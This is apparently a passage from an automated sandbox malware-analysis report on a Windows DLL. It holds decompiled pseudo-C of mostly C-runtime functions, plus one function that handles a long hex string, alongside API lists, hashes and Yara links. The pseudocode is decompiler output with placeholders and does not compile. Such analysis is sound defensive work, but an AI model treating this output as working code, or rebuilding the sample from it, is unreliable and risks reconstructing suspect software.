						_v56 = _t59;
						_v72 = _t59;
						_v64 =  >  ? 0x7fffffff : r12d;
						_t32 =  *_t71();
						_t42 = _t32;
						if(_t59 != 0) {
							if(_t32 < 0) {
								L10:
								 *((char*)(_t59 + _t70 - 1)) = 0;
								_t23 = _t47 - 2; // -2
								_t32 = _t23;
							} else {
								_t14 =  &_v64;
								 *_t14 = _v64 - 1;
								if( *_t14 < 0) {
									if(E67709274(0, 0, _t43, _t47,  &_v72, _t59, _t61) == 0xffffffff) {
										goto L10;
									} else {
										goto L9;
									}
								} else {
									 *_v72 = 0;
									L9:
									_t32 = _t42;
								}
							}
						}
					} else {
						goto L1;
					}
				} else {
					L1:
					E6770851C(_t45);
					 *_t45 = 0x16;
					_t32 = E67709254() | 0xffffffff;
				}
				return _t32;
			}





















                                                                                                                                                  0x677071d8
                                                                                                                                                  0x677071d8
                                                                                                                                                  0x677071d8
                                                                                                                                                  0x677071dd
                                                                                                                                                  0x677071e2
                                                                                                                                                  0x677071ec
                                                                                                                                                  0x677071f5
                                                                                                                                                  0x677071f8
                                                                                                                                                  0x677071fb
                                                                                                                                                  0x67707202
                                                                                                                                                  0x67707202
                                                                                                                                                  0x67707208
                                                                                                                                                  0x6770720b
                                                                                                                                                  0x6770720f
                                                                                                                                                  0x67707217
                                                                                                                                                  0x67707231
                                                                                                                                                  0x6770724e
                                                                                                                                                  0x67707255
                                                                                                                                                  0x6770725c
                                                                                                                                                  0x67707260
                                                                                                                                                  0x67707264
                                                                                                                                                  0x67707267
                                                                                                                                                  0x6770726a
                                                                                                                                                  0x6770726f
                                                                                                                                                  0x67707273
                                                                                                                                                  0x67707296
                                                                                                                                                  0x67707299
                                                                                                                                                  0x677072a1
                                                                                                                                                  0x677072a1
                                                                                                                                                  0x67707275
                                                                                                                                                  0x67707275
                                                                                                                                                  0x67707275
                                                                                                                                                  0x67707278
                                                                                                                                                  0x67707290
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770727a
                                                                                                                                                  0x6770727e
                                                                                                                                                  0x67707292
                                                                                                                                                  0x67707292
                                                                                                                                                  0x67707292
                                                                                                                                                  0x67707278
                                                                                                                                                  0x67707273
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707219
                                                                                                                                                  0x67707219
                                                                                                                                                  0x67707219
                                                                                                                                                  0x6770721e
                                                                                                                                                  0x67707229
                                                                                                                                                  0x67707229
                                                                                                                                                  0x677072bd

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                  • String ID: %s%s%s$B
                                                                                                                                                  • API String ID: 2959964966-1212563304
                                                                                                                                                  • Opcode ID: 16d7ddcab8cfd462ada9179cfbdad313013c06eb6b2f6fb010b08034649c5d04
                                                                                                                                                  • Instruction ID: 7316a47f426b546a5dd5795674d99b78f7d14e8399f813b7a27395d3b05548e1
                                                                                                                                                  • Opcode Fuzzy Hash: 16d7ddcab8cfd462ada9179cfbdad313013c06eb6b2f6fb010b08034649c5d04
                                                                                                                                                  • Instruction Fuzzy Hash: E521B072B10B5099AB01DF7AAA4448D77F4F75DBE8B594626FE6857B48CB30C442C780
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677070DC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E677070DC(intOrPtr* __rax, intOrPtr* __rcx, void* __rdx, intOrPtr* __r8) {
				char _t5;
				intOrPtr _t8;
				intOrPtr* _t12;
				void* _t14;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr* _t17;

				_t16 = __r8;
				_t15 = __rdx;
				_t13 = __rcx;
				_t12 = __rax;
				r10d = 0;
				_t17 = __rcx;
				if(__rcx == 0 || __rdx == 0) {
					L4:
					E6770851C(_t12);
					_t8 = 0x16;
					goto L5;
				} else {
					if(__r8 != 0) {
						while( *_t13 != r10b) {
							_t13 = _t13 + 1;
							_t15 = _t15 - 1;
							if(_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t15 != 0) {
							_t14 = _t13 - _t16;
							while(1) {
								_t5 =  *_t16;
								 *((char*)(_t14 + _t16)) = _t5;
								_t16 = _t16 + 1;
								if(_t5 == 0) {
									break;
								}
								_t15 = _t15 - 1;
								if(_t15 != 0) {
									continue;
								}
								break;
							}
							if(_t15 != 0) {
								return 0;
							}
							 *_t17 = r10b;
							E6770851C(_t12);
							_t8 = 0x22;
							L5:
							 *_t12 = _t8;
							E67709254();
							return _t8;
						}
						 *_t17 = r10b;
						goto L4;
					}
					 *__rcx = r10b;
					goto L4;
				}
			}










                                                                                                                                                  0x677070dc
                                                                                                                                                  0x677070dc
                                                                                                                                                  0x677070dc
                                                                                                                                                  0x677070dc
                                                                                                                                                  0x677070e2
                                                                                                                                                  0x677070e5
                                                                                                                                                  0x677070eb
                                                                                                                                                  0x677070fa
                                                                                                                                                  0x677070fa
                                                                                                                                                  0x677070ff
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677070f2
                                                                                                                                                  0x677070f5
                                                                                                                                                  0x67707113
                                                                                                                                                  0x67707118
                                                                                                                                                  0x6770711b
                                                                                                                                                  0x6770711e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770711e
                                                                                                                                                  0x67707123
                                                                                                                                                  0x6770712a
                                                                                                                                                  0x6770712d
                                                                                                                                                  0x6770712d
                                                                                                                                                  0x67707130
                                                                                                                                                  0x67707134
                                                                                                                                                  0x67707139
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770713b
                                                                                                                                                  0x6770713e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770713e
                                                                                                                                                  0x67707143
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707154
                                                                                                                                                  0x67707145
                                                                                                                                                  0x67707148
                                                                                                                                                  0x6770714d
                                                                                                                                                  0x67707104
                                                                                                                                                  0x67707104
                                                                                                                                                  0x67707106
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770710b
                                                                                                                                                  0x67707125
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67707125
                                                                                                                                                  0x677070f7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677070f7

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435, xrefs: 677070DC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                  • String ID: b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435
                                                                                                                                                  • API String ID: 2819658684-3477985423
                                                                                                                                                  • Opcode ID: 59094983bcbd1b2bf61695b562f19d1637139a5fc0613db5acf74ff83d9f2738
                                                                                                                                                  • Instruction ID: c7dcb8459ba269cb8dffd9568312450c61da3175f85cd202f1908435068f2051
                                                                                                                                                  • Opcode Fuzzy Hash: 59094983bcbd1b2bf61695b562f19d1637139a5fc0613db5acf74ff83d9f2738
                                                                                                                                                  • Instruction Fuzzy Hash: D0F062F174A2C484EF0A07794B9421469E5ABBF388B249DB0CE650B792F12A005A8391
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770861C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,000000FF,67708665,?,?,00000000,6770CF06,?,?,?,6770CFD3,?,?,00000000,67708D5D), ref: 6770862B
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,000000FF,67708665,?,?,00000000,6770CF06,?,?,?,6770CFD3,?,?,00000000,67708D5D), ref: 67708640
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                  • API String ID: 1646373207-1276376045
                                                                                                                                                  • Opcode ID: e31605ced41d3a79d68e47dd045d77a36b95b9297b6d2ce3b64914ef7fc0a1b5
                                                                                                                                                  • Instruction ID: b7897917e9c07c071771b5d6bafa1e2b52c9b46a6dbfd2c474dbce41778d802a
                                                                                                                                                  • Opcode Fuzzy Hash: e31605ced41d3a79d68e47dd045d77a36b95b9297b6d2ce3b64914ef7fc0a1b5
                                                                                                                                                  • Instruction Fuzzy Hash: 07D05B6070974582FF099B90B88532813635B7CB44F8C1438481E0B351FF6DC5A9C310
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704338, Relevance: 6.3, APIs: 5, Instructions: 61stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                  			E67704338(signed int __ecx, void* __edx, void* __ebp, void* __eflags, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, void* __r11) {
				void* _t21;
				int _t33;
				void* _t34;
				signed long long _t40;
				signed long long _t41;
				WCHAR* _t60;
				signed int _t64;
				long long _t66;
				void* _t67;
				void* _t69;
				signed long long _t70;

				_t74 = __r11;
				_t34 = __ebp;
				_t30 = __ecx;
				 *((long long*)(_t69 + 0x10)) = __rbx;
				 *((long long*)(_t69 + 0x18)) = _t66;
				 *((long long*)(_t69 + 0x20)) = __rsi;
				_t70 = _t69 - 0x260;
				_t40 =  *0x67716000; // 0x9b7b11e8241
				_t41 = _t40 ^ _t70;
				 *(_t70 + 0x250) = _t41;
				_t21 = E67705B18(__rcx, __r11);
				_t33 = lstrlenW(_t60);
				if(_t21 == 0) {
					_t33 = _t33 - 1;
				}
				_t5 =  &(_t60[0]); // 0x0
				r8d = _t5;
				lstrcpynW(??, ??, ??);
				if(_t41 != 0) {
					_t67 = E67705B18(_t70 + 0x20, _t74);
					_t30 =  ==  ? _t33 : _t67 + 1;
					_t64 =  ==  ? _t33 : _t67 + 1;
					malloc(??);
					_t11 = _t64 + 1; // 0x1
					r8d = _t11;
					if(_t34 != 0xffffffff) {
					}
					lstrcpynW();
					if(_t41 == 0) {
						free();
						goto L3;
					}
				} else {
					L3:
				}
				return E67706F80(_t30,  *(_t70 + 0x250) ^ _t70);
			}














                                                                                                                                                  0x67704338
                                                                                                                                                  0x67704338
                                                                                                                                                  0x67704338
                                                                                                                                                  0x67704338
                                                                                                                                                  0x6770433d
                                                                                                                                                  0x67704342
                                                                                                                                                  0x67704348
                                                                                                                                                  0x6770434f
                                                                                                                                                  0x67704356
                                                                                                                                                  0x67704359
                                                                                                                                                  0x67704364
                                                                                                                                                  0x67704374
                                                                                                                                                  0x67704378
                                                                                                                                                  0x6770437a
                                                                                                                                                  0x6770437a
                                                                                                                                                  0x6770437c
                                                                                                                                                  0x6770437c
                                                                                                                                                  0x67704388
                                                                                                                                                  0x67704391
                                                                                                                                                  0x677043a1
                                                                                                                                                  0x677043aa
                                                                                                                                                  0x677043ad
                                                                                                                                                  0x677043b5
                                                                                                                                                  0x677043ba
                                                                                                                                                  0x677043ba
                                                                                                                                                  0x677043c4
                                                                                                                                                  0x677043c4
                                                                                                                                                  0x677043db
                                                                                                                                                  0x677043e4
                                                                                                                                                  0x677043e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677043e9
                                                                                                                                                  0x67704393
                                                                                                                                                  0x67704393
                                                                                                                                                  0x67704393
                                                                                                                                                  0x6770441b

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 67705B18: lstrlenW.KERNEL32(?,?,00000000,67704369), ref: 67705B21
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 6770436E
                                                                                                                                                  • lstrcpynW.KERNEL32 ref: 67704388
                                                                                                                                                  • malloc.LIBCMT ref: 677043B5
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • lstrcpynW.KERNEL32 ref: 677043DB
                                                                                                                                                  • free.LIBCMT ref: 677043E9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errnolstrcpynlstrlen$AllocateHeap_callnewhfreemalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2245238962-0
                                                                                                                                                  • Opcode ID: d2ba1e8f533ca925d13bc12aa51f47ae94a7924bf9f3c788caac008a2612db71
                                                                                                                                                  • Instruction ID: 270491c5c721a9eedd227025a517e31994c8b47bb9ac8c647e739b794da160cd
                                                                                                                                                  • Opcode Fuzzy Hash: d2ba1e8f533ca925d13bc12aa51f47ae94a7924bf9f3c788caac008a2612db71
                                                                                                                                                  • Instruction Fuzzy Hash: 0121D071308B8086DA20DB21A59435DA3A1F79DBC8FC40630CE9E57B48EF38D6408700
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770D068, Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 24%
                                                                                                                                                  			E6770D068(void* __ecx, long* __rax, long long __rbx, void* __rdx, long long __rsi, void* __rbp, signed long long __r8, signed int _a8, long long _a16, long long _a24) {
				signed long long _v48;
				intOrPtr _v56;
				signed int _t33;
				intOrPtr _t35;
				signed int _t37;
				void* _t39;
				intOrPtr _t44;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t58;
				signed int _t60;
				void* _t80;
				intOrPtr _t84;
				void* _t88;
				intOrPtr _t89;
				long long _t90;
				void* _t92;
				signed long long _t96;
				intOrPtr* _t97;
				long long* _t98;
				signed long long _t99;

				_t96 = __r8;
				_t92 = __rbp;
				_t90 = __rsi;
				_t88 = __rdx;
				_t78 = __rbx;
				_t71 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t39 = __ecx;
				_t60 = 0;
				_a8 = 0;
				_t50 = __ecx - 2;
				if(_t50 == 0) {
					_t97 = 0x677183a8;
					L22:
					_t60 = 1;
					_a8 = 1;
					__imp__DecodePointer();
					_t98 = _t71;
					L23:
					if(_t98 != 1) {
						if(_t98 == 0) {
							_t9 = _t98 + 3; // 0x3
							E6770897C(_t9, _t71, _t78, _t90, _t96);
							asm("int3");
						}
						if(_t60 != 0) {
							E6770CFB0();
						}
						if(_t39 == 8 || _t39 == 0xb || _t39 == 4) {
							_t99 =  *(_t90 + 0xa8);
							_v48 = _t99;
							 *(_t90 + 0xa8) =  *(_t90 + 0xa8) & 0x00000000;
							if(_t39 != 8) {
								goto L35;
							}
							r14d =  *((intOrPtr*)(_t90 + 0xb0));
							 *((intOrPtr*)(_t90 + 0xb0)) = 0x8c;
							goto L36;
						} else {
							_t99 = _v48;
							L35:
							r14d = _a8;
							L36:
							if(_t39 != 8) {
								E67708CCC();
								 *_t97 = _t71;
								L41:
								if(_t60 != 0) {
									E6770CEB0();
								}
								if(_t39 != 8) {
									 *_t98();
								} else {
									 *_t98();
								}
								if(_t39 == 8 || _t39 == 0xb || _t39 == 4) {
									 *(_t90 + 0xa8) = _t99;
									if(_t39 == 8) {
										 *((intOrPtr*)(_t90 + 0xb0)) = r14d;
									}
								}
								goto L24;
							}
							_t44 =  *0x67712570; // 0x3
							_t52 = _t44;
							_v56 = _t44;
							while(1) {
								_t35 =  *0x67712574; // 0x9
								if(_t52 >= _t44 + _t35) {
									goto L41;
								}
								 *( *((intOrPtr*)(_t90 + 0xa0)) + 8 + (_t52 + _t52) * 8) =  *( *((intOrPtr*)(_t90 + 0xa0)) + 8 + (_t52 + _t52) * 8) & 0x00000000;
								_t52 = _t52 + 1;
								_v56 = _t52;
								_t44 =  *0x67712570; // 0x3
							}
							goto L41;
						}
					}
					L24:
					_t33 = 0;
					L51:
					return _t33;
				}
				_t53 = _t50 - 2;
				if(_t53 == 0) {
					L12:
					_t37 = E67708DBC(_t71, _t78, _t80, _t88, _t90, _t92);
					_t90 = _t71;
					if(_t71 != 0) {
						_t89 =  *((intOrPtr*)(_t71 + 0xa0));
						_t84 = _t89;
						_t96 =  *0x6771257c;
						while( *((intOrPtr*)(_t84 + 4)) != _t39) {
							_t84 = _t84 + 0x10;
							if(_t84 < (_t96 << 4) + _t89) {
								continue;
							}
							break;
						}
						_t71 = (_t96 << 4) + _t89;
						if(_t84 >= _t71 ||  *((intOrPtr*)(_t84 + 4)) != _t39) {
						}
						_t7 = _t84 + 8; // 0x8
						_t97 = _t7;
						_t98 =  *_t97;
						goto L23;
					}
					L13:
					_t33 = _t37 | 0xffffffff;
					goto L51;
				}
				_t54 = _t53 - 2;
				if(_t54 == 0) {
					L11:
					_t97 = 0x677183b8;
					goto L22;
				}
				_t55 = _t54 - 2;
				if(_t55 == 0) {
					goto L12;
				}
				_t56 = _t55 - 3;
				if(_t56 == 0) {
					goto L12;
				}
				_t57 = _t56 - 4;
				if(_t57 == 0) {
					_t97 = 0x677183c0;
					goto L22;
				}
				_t58 = _t57 - 6;
				if(_t58 == 0) {
					_t97 = 0x677183b0;
					goto L22;
				}
				if(_t58 == 1) {
					goto L11;
				} else {
					E6770851C(__rax);
					 *((intOrPtr*)(__rax)) = 0x16;
					_t37 = E67709254();
					goto L13;
				}
			}





























                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d068
                                                                                                                                                  0x6770d06d
                                                                                                                                                  0x6770d07f
                                                                                                                                                  0x6770d081
                                                                                                                                                  0x6770d083
                                                                                                                                                  0x6770d08b
                                                                                                                                                  0x6770d08e
                                                                                                                                                  0x6770d159
                                                                                                                                                  0x6770d167
                                                                                                                                                  0x6770d167
                                                                                                                                                  0x6770d16c
                                                                                                                                                  0x6770d170
                                                                                                                                                  0x6770d176
                                                                                                                                                  0x6770d179
                                                                                                                                                  0x6770d17d
                                                                                                                                                  0x6770d189
                                                                                                                                                  0x6770d18b
                                                                                                                                                  0x6770d18f
                                                                                                                                                  0x6770d194
                                                                                                                                                  0x6770d194
                                                                                                                                                  0x6770d197
                                                                                                                                                  0x6770d19b
                                                                                                                                                  0x6770d19b
                                                                                                                                                  0x6770d1a4
                                                                                                                                                  0x6770d1b7
                                                                                                                                                  0x6770d1be
                                                                                                                                                  0x6770d1c3
                                                                                                                                                  0x6770d1ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d1d0
                                                                                                                                                  0x6770d1d7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d1b0
                                                                                                                                                  0x6770d1b0
                                                                                                                                                  0x6770d1e3
                                                                                                                                                  0x6770d1e3
                                                                                                                                                  0x6770d1e8
                                                                                                                                                  0x6770d1eb
                                                                                                                                                  0x6770d226
                                                                                                                                                  0x6770d22b
                                                                                                                                                  0x6770d22f
                                                                                                                                                  0x6770d231
                                                                                                                                                  0x6770d235
                                                                                                                                                  0x6770d235
                                                                                                                                                  0x6770d241
                                                                                                                                                  0x6770d252
                                                                                                                                                  0x6770d243
                                                                                                                                                  0x6770d24b
                                                                                                                                                  0x6770d24b
                                                                                                                                                  0x6770d257
                                                                                                                                                  0x6770d267
                                                                                                                                                  0x6770d270
                                                                                                                                                  0x6770d276
                                                                                                                                                  0x6770d276
                                                                                                                                                  0x6770d270
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d257
                                                                                                                                                  0x6770d1ed
                                                                                                                                                  0x6770d1f3
                                                                                                                                                  0x6770d1f5
                                                                                                                                                  0x6770d1f9
                                                                                                                                                  0x6770d1f9
                                                                                                                                                  0x6770d203
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d212
                                                                                                                                                  0x6770d218
                                                                                                                                                  0x6770d21a
                                                                                                                                                  0x6770d21e
                                                                                                                                                  0x6770d21e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d1f9
                                                                                                                                                  0x6770d1a4
                                                                                                                                                  0x6770d17f
                                                                                                                                                  0x6770d17f
                                                                                                                                                  0x6770d282
                                                                                                                                                  0x6770d299
                                                                                                                                                  0x6770d299
                                                                                                                                                  0x6770d094
                                                                                                                                                  0x6770d097
                                                                                                                                                  0x6770d0fb
                                                                                                                                                  0x6770d0fb
                                                                                                                                                  0x6770d100
                                                                                                                                                  0x6770d106
                                                                                                                                                  0x6770d110
                                                                                                                                                  0x6770d117
                                                                                                                                                  0x6770d11a
                                                                                                                                                  0x6770d121
                                                                                                                                                  0x6770d126
                                                                                                                                                  0x6770d137
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d137
                                                                                                                                                  0x6770d140
                                                                                                                                                  0x6770d146
                                                                                                                                                  0x6770d146
                                                                                                                                                  0x6770d14f
                                                                                                                                                  0x6770d14f
                                                                                                                                                  0x6770d153
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d153
                                                                                                                                                  0x6770d108
                                                                                                                                                  0x6770d108
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d108
                                                                                                                                                  0x6770d099
                                                                                                                                                  0x6770d09c
                                                                                                                                                  0x6770d0eb
                                                                                                                                                  0x6770d0eb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0f2
                                                                                                                                                  0x6770d09e
                                                                                                                                                  0x6770d0a1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0a3
                                                                                                                                                  0x6770d0a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0a8
                                                                                                                                                  0x6770d0ab
                                                                                                                                                  0x6770d0db
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0e2
                                                                                                                                                  0x6770d0ad
                                                                                                                                                  0x6770d0b0
                                                                                                                                                  0x6770d0c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0cf
                                                                                                                                                  0x6770d0b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0b6
                                                                                                                                                  0x6770d0b6
                                                                                                                                                  0x6770d0bb
                                                                                                                                                  0x6770d0c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770d0c1

                                                                                                                                                  APIs
                                                                                                                                                  • _errno.LIBCMT ref: 6770D0B6
                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 6770D0C1
                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,6770FA0C,?,?,?,?,6770D012), ref: 6770D170
                                                                                                                                                  • _lock.LIBCMT ref: 6770D19B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 27599310-0
                                                                                                                                                  • Opcode ID: 3d8dfe7d49400dd4f4d06d682c64009c4359dcd1049bcebcb7809a658ca001f6
                                                                                                                                                  • Instruction ID: e71a2ce575a01ad6c44383db091f3f6b9478dc4b1c7b0edc173e9a333eeb99bd
                                                                                                                                                  • Opcode Fuzzy Hash: 3d8dfe7d49400dd4f4d06d682c64009c4359dcd1049bcebcb7809a658ca001f6
                                                                                                                                                  • Instruction Fuzzy Hash: A051CDB270874086DB15CB34EA8032A76B2F78E798F794D26DA6E43728DF39C541C709
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67705210, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 87stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E67705210(void* __ecx, void* __esp, signed long long __rax, signed long long __rbx, signed long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t28;
				void* _t31;
				signed int _t39;
				signed int _t40;
				void* _t44;
				void* _t46;
				signed long long _t58;
				signed char* _t62;
				signed long long _t73;
				void* _t74;
				signed long long _t75;
				long long _t77;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				signed long long _t86;
				void* _t87;
				signed long long _t88;

				_t77 = __rbp;
				_t75 = __rsi;
				_t60 = __rbx;
				_t58 = __rax;
				_t46 = __esp;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				r15d = __ecx;
				do {
					E6770532C(4, _t58, _t60, _t75);
					_t72 =  *(_t58 + 8);
					_t39 =  *( *(_t58 + 8));
					E677039E8(_t39, _t46, _t58, _t60, _t58, _t74);
					if(_t39 < 0) {
						_t39 =  ~_t39;
					}
					_t40 = _t39 & 0x80000007;
					if(_t40 < 0) {
						_t40 = (_t40 - 0x00000001 | 0xfffffff8) + 1;
					}
				} while (_t40 <= 1);
				E67701000(_t60, "b8475f89b27fc0ca444d46e0867b6af4508b6ecba192e53e424a3bb06c28a2eedbdef706d0d0329f9f0fef7a5a766f60f63ae0597f96b3f46d8d0ea78435", _t72, _t82);
				_t86 = _t58;
				do {
					_t52 = _t75;
					if(_t75 != 0) {
						free();
					}
					_t73 = _t86;
					_t44 = 0;
					E67705398(_t40, _t46, _t60, _t73, _t74, _t75, _t77, _t84);
					_t75 = _t58;
					E67703938(lstrlenA(??), _t46, _t58, _t60, _t75, _t75, _t82);
					_t60 = _t58;
					E67703A1C(_t52, _t58, _t58, _t75);
					_t88 = _t58;
					E677039E8(_t40, _t46, _t58, _t58, _t58, _t74);
					if( *_t88 > 0) {
						_t62 =  *((intOrPtr*)(_t88 + 8));
						r13d =  *_t88;
						do {
							if(E6770753C(_t31,  *_t62 & 0x000000ff, _t40, _t75, _t83, _t84, _t85) != 0) {
								_t44 = _t77 + _t58 - 0x30;
							}
							_t62 =  &(_t62[1]);
							_t87 = _t87 - 1;
						} while (_t87 != 0);
					}
